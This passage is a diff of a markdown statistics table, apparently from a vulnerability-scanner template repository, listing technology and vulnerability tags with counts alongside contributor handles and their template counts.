samsung | 4 | 0xsapra | 2 | | | | | | | +| hongdian | 4 | amsda | 2 | | | | | | | +| solarwinds | 4 | random-robbie | 2 | | | | | | | +| slack | 4 | moritz nentwig | 2 | | | | | | | +| thinkphp | 4 | 0xelkomy | 2 | | | | | | | | elastic | 4 | bsysop | 2 | | | | | | | -| maps | 4 | moritz nentwig | 2 | | | | | | | -| exchange | 4 | alifathi-h1 | 2 | | | | | | | -| traversal | 4 | swissky | 2 | | | | | | | -| firmware | 4 | bing0o | 2 | | | | | | | -| rfi | 4 | convisoappsec | 2 | | | | | | | -| samsung | 4 | lotusdll | 2 | | | | | | | -| symantec | 4 | ehsahil | 2 | | | | | | | -| amazon | 4 | mubassirpatel | 1 | | | | | | | -| symfony | 4 | smaranchand | 1 | | | | | | | -| zabbix | 4 | omarkurt | 1 | | | | | | | -| wso2 | 4 | thevillagehacker | 1 | | | | | | | -| asp | 4 | mhdsamx | 1 | | | | | | | -| glpi | 4 | micha3lb3n | 1 | | | | | | | -| firebase | 4 | taielab | 1 | | | | | | | -| zimbra | 4 | luskabol | 1 | | | | | | | -| vpn | 4 | iampritam | 1 | | | | | | | -| git | 4 | hanlaomo | 1 | | | | | | | -| artifactory | 4 | ohlinge | 1 | | | | | | | -| slack | 4 | regala_ | 1 | | | | | | | -| buffalo | 4 | petruknisme | 1 | | | | | | | -| magmi | 4 | j33n1k4 | 1 | | | | | | | -| proxy | 4 | tirtha_mandal | 1 | | | | | | | -| moodle | 4 | 0ut0fb4nd | 1 | | | | | | | -| fpd | 3 | aceseven (digisec360) | 1 | | | | | | | -| nosqli | 3 | soyelmago | 1 | | | | | | | -| jeesns | 3 | 0xteles | 1 | | | | | | | -| caucho | 3 | wabafet | 1 | | | | | | | -| openam | 3 | evolutionsec | 1 | | | | | | | -| tikiwiki | 3 | udyz | 1 | | | | | | | -| terramaster | 3 | yashgoti | 1 | | | | | | | -| springcloud | 3 | akash.c | 1 | | | | | | | -| ebs | 3 | alperenkesk | 1 | | | | | | | -| lansweeper | 3 | dawid-czarnecki | 1 | | | | | | | -| cacti | 3 | kba@sogeti_esec | 1 | | | | | | | -| telerik | 3 | fmunozs | 1 | | | | | | | -| exposures | 3 | naglinagli | 1 | | | | | | | -| lfr | 3 | elder tao | 1 | | | | | | | -| prometheus | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| vbulletin | 3 | sec_hawk | 1 | | | | | | | -| httpd | 3 | elouhi | 1 | | | | | | | -| smtp | 3 | alex | 1 | | | | | | | -| fanruan | 3 | pudsec | 1 | | | | | | | -| itop | 3 | jrolf | 1 | | | | | | | -| cve2007 | 3 | qlkwej | 1 | | | | | | | -| kevinlab | 3 | co0nan | 1 | | | | | | | -| mail | 3 | oscarintherocks | 1 | | | | | | | -| backdoor | 3 | manuelbua | 1 | | | | | | | -| ofbiz | 3 | affix | 1 | | | | | | | -| r-seenet | 3 | vzamanillo | 1 | | | | | | | -| opensis | 3 | noamrathaus | 1 | | | | | | | -| kafka | 3 | @dwisiswant0 | 1 | | | | | | | -| openssh | 3 | un-fmunozs | 1 | | | | | | | -| cloud | 3 | notsoevilweasel | 1 | | | | | | | -| github | 3 | andirrahmani1 | 1 | | | | | | | -| jellyfin | 3 | shelld3v | 1 | | | | | | | -| search | 3 | bad5ect0r | 1 | | | | | | | -| hoteldruid | 3 | nytr0gen | 1 | | | | | | | -| log | 3 | its0x08 | 1 | | | | | | | -| druid | 3 | mesaglio | 1 | | | | | | | -| linkerd | 3 | 52971 | 1 | | | | | | | -| targa | 3 | ratnadip gajbhiye | 1 | | | | | | | -| nacos | 3 | flag007 | 1 | | | | | | | -| microstrategy | 3 | mass0ma | 1 | | | | | | | -| node | 3 | deena | 1 | | | | | | | -| injection | 3 | 0xtavian | 1 | | | | | | | -| cves | 3 | @ofjaaah | 1 | | | | | | | -| bitrix | 3 | b4uh0lz | 1 | | | | | | | -| nexus | 3 | apt-mirror | 1 | | | | | | | -| bigip | 3 | whynotke | 1 | | | | | | | -| oa | 3 | _darrenmartyn | 1 | | | | | | | -| ssh | 3 | knassar702 | 1 | | | | | | | -| azure | 3 | gboddin | 1 | | | | | | | -| zhiyuan | 3 | c3l3si4n | 1 | | | | | | | -| mongodb | 3 | rojanrijal | 1 | | | | | | | -| kibana | 3 | jeya seelan | 1 | | | | | | | -| mcafee | 2 | luci | 1 | | | | | | | -| nextcloud | 2 | sicksec | 1 | | | | | | | -| xxljob | 2 | bolli95 | 1 | | | | | | | -| bruteforce | 2 | push4d | 1 | | | | | | | -| hashicorp | 2 | defr0ggy | 1 | | | | | | | -| ec2 | 2 | ahmed sherif | 1 | | | | | | | -| wuzhicms | 2 | 0xd0ff9 | 1 | | | | | | | -| axis | 2 | shreyapohekar | 1 | | | | | | | -| netis | 2 | infosecsanyam | 1 | | | | | | | -| splunk | 2 | forgedhallpass | 1 | | | | | | | -| chiyu | 2 | aaron_costello | 1 | | | | | | | +| git | 4 | manas_harsh | 2 | | | | | | | +| moodle | 4 | zomsop82 | 2 | | | | | | | +| webserver | 4 | sy3omda | 2 | | | | | | | +| buffalo | 4 | 0xrudra | 2 | | | | | | | +| strapi | 4 | fabaff | 2 | | | | | | | +| magmi | 4 | hahwul | 2 | | | | | | | +| maps | 4 | foulenzer | 2 | | | | | | | +| proxy | 4 | cocxanh | 2 | | | | | | | +| grafana | 4 | push4d | 1 | | | | | | | +| rfi | 4 | thevillagehacker | 1 | | | | | | | +| firmware | 4 | elouhi | 1 | | | | | | | +| thinkcmf | 4 | kurohost | 1 | | | | | | | +| firebase | 4 | naglinagli | 1 | | | | | | | +| resin | 4 | sicksec | 1 | | | | | | | +| exchange | 4 | luci | 1 | | | | | | | +| vpn | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | +| glpi | 4 | makyotox | 1 | | | | | | | +| wso2 | 4 | undefl0w | 1 | | | | | | | +| artifactory | 4 | patralos | 1 | | | | | | | +| symfony | 4 | omarkurt | 1 | | | | | | | +| zimbra | 4 | bolli95 | 1 | | | | | | | +| symantec | 4 | orpheus | 1 | | | | | | | +| traversal | 4 | cristi vlad (@cristivlad25) | 1 | | | | | | | +| asp | 4 | infosecsanyam | 1 | | | | | | | +| kibana | 3 | oscarintherocks | 1 | | | | | | | +| kafka | 3 | intx0x80 | 1 | | | | | | | +| ebs | 3 | wabafet | 1 | | | | | | | +| vbulletin | 3 | borna nematzadeh | 1 | | | | | | | +| mongodb | 3 | nerrorsec | 1 | | | | | | | +| azure | 3 | becivells | 1 | | | | | | | +| hoteldruid | 3 | remonsec | 1 | | | | | | | +| lansweeper | 3 | andirrahmani1 | 1 | | | | | | | +| backdoor | 3 | @ofjaaah | 1 | | | | | | | +| tikiwiki | 3 | yashanand155 | 1 | | | | | | | +| druid | 3 | toufik airane | 1 | | | | | | | +| bigip | 3 | exploitation | 1 | | | | | | | +| openssh | 3 | alex | 1 | | | | | | | +| httpd | 3 | b0rn2r00t | 1 | | | | | | | +| springcloud | 3 | smaranchand | 1 | | | | | | | +| cves | 3 | akash.c | 1 | | | | | | | +| cloud | 3 | raesene | 1 | | | | | | | +| fanruan | 3 | aresx | 1 | | | | | | | +| smtp | 3 | juicypotato1 | 1 | | | | | | | +| openam | 3 | forgedhallpass | 1 | | | | | | | +| kevinlab | 3 | mah3sec_ | 1 | | | | | | | +| nosqli | 3 | shreyapohekar | 1 | | | | | | | +| ssh | 3 | 0xrod | 1 | | | | | | | +| mail | 3 | 0h1in9e | 1 | | | | | | | +| terramaster | 3 | berkdusunur | 1 | | | | | | | +| nacos | 3 | retr0 | 1 | | | | | | | +| node | 3 | b4uh0lz | 1 | | | | | | | +| prometheus | 3 | notsoevilweasel | 1 | | | | | | | +| jeesns | 3 | @dwisiswant0 | 1 | | | | | | | +| oa | 3 | jteles | 1 | | | | | | | +| search | 3 | c3l3si4n | 1 | | | | | | | +| exposures | 3 | chron0x | 1 | | | | | | | +| lfr | 3 | mubassirpatel | 1 | | | | | | | +| ofbiz | 3 | schniggie | 1 | | | | | | | +| opensis | 3 | d0rkerdevil | 1 | | | | | | | +| injection | 3 | izn0u | 1 | | | | | | | +| microstrategy | 3 | ahmed sherif | 1 | | | | | | | +| cve2007 | 3 | 0xd0ff9 | 1 | | | | | | | +| caucho | 3 | thebinitghimire | 1 | | | | | | | +| targa | 3 | mass0ma | 1 | | | | | | | +| log | 3 | _harleo | 1 | | | | | | | +| linkerd | 3 | rodnt | 1 | | | | | | | +| jellyfin | 3 | willd96 | 1 | | | | | | | +| nexus | 3 | furkansenan | 1 | | | | | | | +| cacti | 3 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| rstudio | 2 | yavolo | 1 | | | | | | | -| yii | 2 | toufik airane | 1 | | | | | | | -| ucmdb | 2 | ooooooo_q | 1 | | | | | | | -| frp | 2 | mah3sec_ | 1 | | | | | | | -| smb | 2 | akshansh | 1 | | | | | | | -| guacamole | 2 | remonsec | 1 | | | | | | | -| ecology | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| rancher | 2 | kre80r | 1 | | | | | | | -| jeedom | 2 | thebinitghimire | 1 | | | | | | | -| s3 | 2 | th3.d1p4k | 1 | | | | | | | -| icewarp | 2 | 0h1in9e | 1 | | | | | | | -| bucket | 2 | alph4byt3 | 1 | | | | | | | -| places | 2 | rotemreiss | 1 | | | | | | | -| tidb | 2 | clarkvoss | 1 | | | | | | | -| hostheader-injection | 2 | cookiehanhoan | 1 | | | | | | | -| getsimple | 2 | ldionmarcil | 1 | | | | | | | -| hasura | 2 | nerrorsec | 1 | | | | | | | -| maian | 2 | @github.com/defr0ggy | 1 | | | | | | | -| heroku | 2 | brabbit10 | 1 | | | | | | | -| voipmonitor | 2 | fopina | 1 | | | | | | | -| text | 2 | d0rkerdevil | 1 | | | | | | | -| cve2005 | 2 | s1r1u5_ | 1 | | | | | | | -| trixbox | 2 | pratik khalane | 1 | | | | | | | -| hjtcloud | 2 | yashanand155 | 1 | | | | | | | -| sitecore | 2 | tim_koopmans | 1 | | | | | | | -| totemomail | 2 | zhenwarx | 1 | | | | | | | -| cache | 2 | hakluke | 1 | | | | | | | -| saltstack | 2 | raesene | 1 | | | | | | | -| showdoc | 2 | chron0x | 1 | | | | | | | -| axis2 | 2 | _c0wb0y_ | 1 | | | | | | | -| wordfence | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| yapi | 2 | b0yd | 1 | | | | | | | -| db | 2 | blckraven | 1 | | | | | | | -| prestashop | 2 | ahmetpergamum | 1 | | | | | | | -| jboss | 2 | lark lab | 1 | | | | | | | -| activemq | 2 | schniggie | 1 | | | | | | | -| justwriting | 2 | retr0 | 1 | | | | | | | -| hpe | 2 | patralos | 1 | | | | | | | -| vcenter | 2 | 0xrod | 1 | | | | | | | -| horde | 2 | pdp | 1 | | | | | | | -| kong | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| upload | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| fpd | 3 | taielab | 1 | | | | | | | +| itop | 3 | ohlinge | 1 | | | | | | | +| bitrix | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| zhiyuan | 3 | nvn1729 | 1 | | | | | | | +| github | 3 | tim_koopmans | 1 | | | | | | | +| r-seenet | 3 | j33n1k4 | 1 | | | | | | | +| telerik | 3 | udyz | 1 | | | | | | | +| bypass | 2 | ratnadip gajbhiye | 1 | | | | | | | +| prestashop | 2 | luskabol | 1 | | | | | | | +| idrac | 2 | ldionmarcil | 1 | | | | | | | +| flir | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| smb | 2 | adrianmf | 1 | | | | | | | +| jeedom | 2 | evolutionsec | 1 | | | | | | | +| minio | 2 | affix | 1 | | | | | | | +| phpcollab | 2 | gboddin | 1 | | | | | | | +| huawei | 2 | mhdsamx | 1 | | | | | | | +| jboss | 2 | yavolo | 1 | | | | | | | +| getsimple | 2 | rotemreiss | 1 | | | | | | | +| aruba | 2 | zandros0 | 1 | | | | | | | +| axis2 | 2 | deena | 1 | | | | | | | +| wordfence | 2 | 52971 | 1 | | | | | | | +| saltstack | 2 | hanlaomo | 1 | | | | | | | +| hostheader-injection | 2 | petruknisme | 1 | | | | | | | +| vrealize | 2 | nytr0gen | 1 | | | | | | | +| frp | 2 | th3.d1p4k | 1 | | | | | | | +| icewarp | 2 | _darrenmartyn | 1 | | | | | | | +| cve2005 | 2 | @github.com/defr0ggy | 1 | | | | | | | +| mida | 2 | kre80r | 1 | | | | | | | +| waf | 2 | kabirsuda | 1 | | | | | | | +| service | 2 | alph4byt3 | 1 | | | | | | | +| hjtcloud | 2 | knassar702 | 1 | | | | | | | +| upload | 2 | philippdelteil | 1 | | | | | | | +| lotus | 2 | elmahdi | 1 | | | | | | | +| activemq | 2 | blckraven | 1 | | | | | | | +| qihang | 2 | sec_hawk | 1 | | | | | | | +| guacamole | 2 | yashgoti | 1 | | | | | | | +| plesk | 2 | co0nan | 1 | | | | | | | +| hasura | 2 | alperenkesk | 1 | | | | | | | +| bucket | 2 | kba@sogeti_esec | 1 | | | | | | | +| linux | 2 | b0yd | 1 | | | | | | | +| dos | 2 | absshax | 1 | | | | | | | +| nextcloud | 2 | streetofhackerr007 | 1 | | | | | | | +| pega | 2 | whynotke | 1 | | | | | | | +| adminer | 2 | noamrathaus | 1 | | | | | | | +| axis | 2 | ahmetpergamum | 1 | | | | | | | +| dolibarr | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| adminer | 2 | nvn1729 | 1 | | | | | | | -| pega | 2 | ilovebinbash | 1 | | | | | | | -| status | 2 | daviey | 1 | | | | | | | -| backups | 2 | _harleo | 1 | | | | | | | -| flir | 2 | bernardo rodrigues | 1 | | | | | | | +| couchdb | 2 | aceseven (digisec360) | 1 | | | | | | | +| s3 | 2 | elder tao | 1 | | | | | | | +| netsweeper | 2 | sickwell | 1 | | | | | | | +| qcubed | 2 | shifacyclewla | 1 | | | | | | | +| globalprotect | 2 | lark lab | 1 | | | | | | | +| favicon | 2 | mesaglio | 1 | | | | | | | +| embed | 2 | droberson | 1 | | | | | | | +| commax | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| places | 2 | 0xtavian | 1 | | | | | | | +| oauth | 2 | ajaysenr | 1 | | | | | | | +| webcam | 2 | bjhulst | 1 | | | | | | | +| backups | 2 | cookiehanhoan | 1 | | | | | | | +| vcenter | 2 | ringo | 1 | | | | | | | +| totemomail | 2 | hakluke | 1 | | | | | | | +| yii | 2 | brabbit10 | 1 | | | | | | | +| text | 2 | kareemse1im | 1 | | | | | | | +| db | 2 | regala_ | 1 | | | | | | | +| glassfish | 2 | pudsec | 1 | | | | | | | +| rockmongo | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| nextjs | 2 | sshell | 1 | | | | | | | -| service | 2 | aresx | 1 | | | | | | | -| embed | 2 | undefl0w | 1 | | | | | | | -| shellshock | 2 | izn0u | 1 | | | | | | | -| sonarqube | 2 | borna nematzadeh | 1 | | | | | | | -| harbor | 2 | xstp | 1 | | | | | | | -| glassfish | 2 | juicypotato1 | 1 | | | | | | | -| igs | 2 | zandros0 | 1 | | | | | | | -| enumeration | 2 | furkansenan | 1 | | | | | | | -| dolibarr | 2 | bjhulst | 1 | | | | | | | -| aruba | 2 | rodnt | 1 | | | | | | | -| ilo | 2 | revblock | 1 | | | | | | | -| chyrp | 2 | adrianmf | 1 | | | | | | | -| seeyon | 2 | b0rn2r00t | 1 | | | | | | | -| waf | 2 | kurohost | 1 | | | | | | | -| akamai | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| sharepoint | 2 | ipanda | 1 | | | | | | | -| rockmongo | 2 | sickwell | 1 | | | | | | | -| mida | 2 | jteles | 1 | | | | | | | -| middleware | 2 | makyotox | 1 | | | | | | | -| plesk | 2 | droberson | 1 | | | | | | | -| electron | 2 | orpheus | 1 | | | | | | | -| odoo | 2 | intx0x80 | 1 | | | | | | | -| lotus | 2 | becivells | 1 | | | | | | | -| natshell | 2 | absshax | 1 | | | | | | | -| qihang | 2 | ajaysenr | 1 | | | | | | | -| kentico | 2 | streetofhackerr007 | 1 | | | | | | | -| paloalto | 2 | thezakman | 1 | | | | | | | -| avantfax | 2 | philippdelteil | 1 | | | | | | | -| favicon | 2 | elmahdi | 1 | | | | | | | -| ecoa | 2 | shifacyclewla | 1 | | | | | | | -| oauth | 2 | ringo | 1 | | | | | | | -| huawei | 2 | x6263 | 1 | | | | | | | -| dos | 2 | geraldino2 | 1 | | | | | | | -| openvpn | 2 | willd96 | 1 | | | | | | | -| aviatrix | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| nagios | 2 | andysvints | 1 | | | | | | | -| bitly | 2 | exploitation | 1 | | | | | | | -| phpcollab | 2 | kareemse1im | 1 | | | | | | | -| vrealize | 2 | kabirsuda | 1 | | | | | | | -| openfire | 2 | berkdusunur | 1 | | | | | | | -| fortios | 2 | | | | | | | | | -| payara | 2 | | | | | | | | | -| mailchimp | 2 | | | | | | | | | -| chamilo | 2 | | | | | | | | | -| netsweeper | 2 | | | | | | | | | -| couchdb | 2 | | | | | | | | | -| spark | 2 | | | | | | | | | -| liferay | 2 | | | | | | | | | -| commax | 2 | | | | | | | | | -| keycloak | 2 | | | | | | | | | -| bypass | 2 | | | | | | | | | -| geowebserver | 2 | | | | | | | | | -| webcam | 2 | | | | | | | | | +| fortios | 2 | manuelbua | 1 | | | | | | | +| chyrp | 2 | tirtha_mandal | 1 | | | | | | | +| ucmdb | 2 | xstp | 1 | | | | | | | +| akamai | 2 | shelld3v | 1 | | | | | | | +| shellshock | 2 | pdp | 1 | | | | | | | +| middleware | 2 | defr0ggy | 1 | | | | | | | +| igs | 2 | dawid-czarnecki | 1 | | | | | | | +| sonarqube | 2 | flag007 | 1 | | | | | | | +| ecoa | 2 | micha3lb3n | 1 | | | | | | | +| keycloak | 2 | jeya seelan | 1 | | | | | | | +| bitly | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| akkadian | 2 | akshansh | 1 | | | | | | | +| kong | 2 | bad5ect0r | 1 | | | | | | | +| chamilo | 2 | thezakman | 1 | | | | | | | +| wuzhicms | 2 | soyelmago | 1 | | | | | | | +| horde | 2 | s1r1u5_ | 1 | | | | | | | +| nextjs | 2 | un-fmunozs | 1 | | | | | | | +| payara | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| electron | 2 | iampritam | 1 | | | | | | | +| prtg | 2 | 0xteles | 1 | | | | | | | +| voipmonitor | 2 | pratik khalane | 1 | | | | | | | +| bruteforce | 2 | fmunozs | 1 | | | | | | | +| sharepoint | 2 | x6263 | 1 | | | | | | | +| rancher | 2 | clarkvoss | 1 | | | | | | | +| openfire | 2 | geraldino2 | 1 | | | | | | | +| maian | 2 | ipanda | 1 | | | | | | | +| xxljob | 2 | sshell | 1 | | | | | | | +| status | 2 | zhenwarx | 1 | | | | | | | +| sonicwall | 2 | apt-mirror | 1 | | | | | | | +| liferay | 2 | andysvints | 1 | | | | | | | +| avantfax | 2 | revblock | 1 | | | | | | | +| netis | 2 | fopina | 1 | | | | | | | +| splunk | 2 | _c0wb0y_ | 1 | | | | | | | +| odoo | 2 | ooooooo_q | 1 | | | | | | | +| openvpn | 2 | 0ut0fb4nd | 1 | | | | | | | +| ilo | 2 | qlkwej | 1 | | | | | | | +| mailchimp | 2 | daviey | 1 | | | | | | | +| justwriting | 2 | jrolf | 1 | | | | | | | +| rstudio | 2 | rojanrijal | 1 | | | | | | | +| chiyu | 2 | its0x08 | 1 | | | | | | | +| kentico | 2 | vzamanillo | 1 | | | | | | | +| enumeration | 2 | ilovebinbash | 1 | | | | | | | | jsf | 2 | | | | | | | | | +| hpe | 2 | | | | | | | | | +| mcafee | 2 | | | | | | | | | +| tidb | 2 | | | | | | | | | | grav | 2 | | | | | | | | | -| qcubed | 2 | | | | | | | | | -| minio | 2 | | | | | | | | | -| sonicwall | 2 | | | | | | | | | -| emerge | 2 | | | | | | | | | -| storage | 2 | | | | | | | | | -| prtg | 2 | | | | | | | | | -| linux | 2 | | | | | | | | | +| cache | 2 | | | | | | | | | +| sitecore | 2 | | | | | | | | | +| natshell | 2 | | | | | | | | | | leak | 2 | | | | | | | | | -| globalprotect | 2 | | | | | | | | | -| idrac | 2 | | | | | | | | | -| akkadian | 2 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| lokalise | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| roads | 1 | | | | | | | | | -| pivotaltracker | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| jaspersoft | 1 | | | | | | | | | -| messaging | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| phpshowtime | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| flexbe | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| travis | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| burp | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| playable | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| basic-auth | 1 | | | | | | | | | -| nerdgraph | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| buttercms | 1 | | | | | | | | | -| square | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| phpwiki | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| websphere | 1 | | | | | | | | | -| tugboat | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| circle | 1 | | | | | | | | | -| distance | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| nimble | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| etherpad | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| cscart | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| imap | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | +| trixbox | 2 | | | | | | | | | +| geowebserver | 2 | | | | | | | | | +| harbor | 2 | | | | | | | | | +| yapi | 2 | | | | | | | | | +| aviatrix | 2 | | | | | | | | | +| spark | 2 | | | | | | | | | +| paloalto | 2 | | | | | | | | | +| storage | 2 | | | | | | | | | +| emerge | 2 | | | | | | | | | +| heroku | 2 | | | | | | | | | +| seeyon | 2 | | | | | | | | | +| showdoc | 2 | | | | | | | | | +| nagios | 2 | | | | | | | | | +| hashicorp | 2 | | | | | | | | | +| ecology | 2 | | | | | | | | | +| ec2 | 2 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | | weiphp | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| adiscon | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| cherokee | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| asana | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | | pgadmin | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| cves2001 | 1 | | | | | | | | | +| hubspot | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| digitalocean | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | | lg-nas | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| bing | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| package | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | | aura | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | | tamronos | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| find | 1 | | | | | | 